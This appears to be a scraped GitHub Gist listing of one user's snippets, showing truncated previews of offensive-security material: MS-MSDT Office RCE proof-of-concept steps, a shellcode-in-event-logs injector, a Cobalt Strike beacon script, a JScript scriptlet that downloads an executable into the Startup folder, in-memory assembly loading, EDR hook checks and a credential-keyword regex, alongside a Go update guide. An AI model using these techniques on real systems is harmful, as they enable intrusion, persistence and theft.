Skip to content

Instantly share code, notes, and snippets.

@fuckup1337
fuckup1337 / ms-msdt.MD
Created June 1, 2022 17:12 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@fuckup1337
fuckup1337 / update-golang.md
Created May 31, 2022 06:23 — forked from nikhita/update-golang.md
How to update the Go version

How to update the Go version

System: Debian/Ubuntu/Fedora. Might work for others as well.

1. Uninstall the exisiting version

As mentioned here, to update a go version you will first need to uninstall the original version.

To uninstall, delete the /usr/local/go directory by:

@fuckup1337
fuckup1337 / EventLogInject.cs
Created May 9, 2022 15:02
POC to inject and extract shellcode from Windows Event Logs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace HiddenEventLogs
{
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
on heartbeat_15m {
foreach $beacon (beacons()) {
println("[VPN] Running command on id: " . $beacon['id'] . ", hostname:" . binfo($beacon['id'], "computer") . "\n");
$id = $beacon['id'];
bipconfig($id,{
print("[VPN] Captured network interfaces from " . binfo($1, "computer") . ", looking for a new IPs to alert on\n");
exec("python3.7 /<fullpath>/AlertOnNewIp.py --data " . transform($2, "powershell-base64") . " --user " . binfo($1, "user") . " --computer " . binfo($1, "computer"));
});
}
#!/usr/bin/env python
# Super dirty python3 scripts that alerts Cobalt Strike operator using pushover when a new IP is found amoung network interface on beacon
# Aggressor script for triggering this : https://gist.github.com/Flangvik/c31b26129743be699133dc9dab9c02c5
import argparse
from datetime import datetime
from base64 import b64encode,b64decode
from pushover import init, Client
from os import path
parser = argparse.ArgumentParser(description='beacon info')
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var w = new ActiveXObject("WScript.Shell");
localpath = w.SpecialFolders("Startup") + "\\file.exe";
url = "https://raw.githubusercontent.com/fuckup1337/calc/main/calc.exe";
@fuckup1337
fuckup1337 / findhooks.cs
Created December 20, 2021 00:50
Find hooked API's using C#
using System;
using System.Runtime.InteropServices;
/* References
* 1. https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions
* 2. https://github.com/Mr-Un1k0d3r/EDRs
*/
namespace SharpHookCheck
{
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
@fuckup1337
fuckup1337 / TestAssembly.cs
Created August 16, 2021 16:19 — forked from Arno0x/TestAssembly.cs
This code shows how to load a CLR in an unmanaged process, then load an assembly from memory (not from a file) and execute a method
/*
================================ Compile as a .Net DLL ==============================
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs
*/
using System.Windows.Forms;
namespace TestNamespace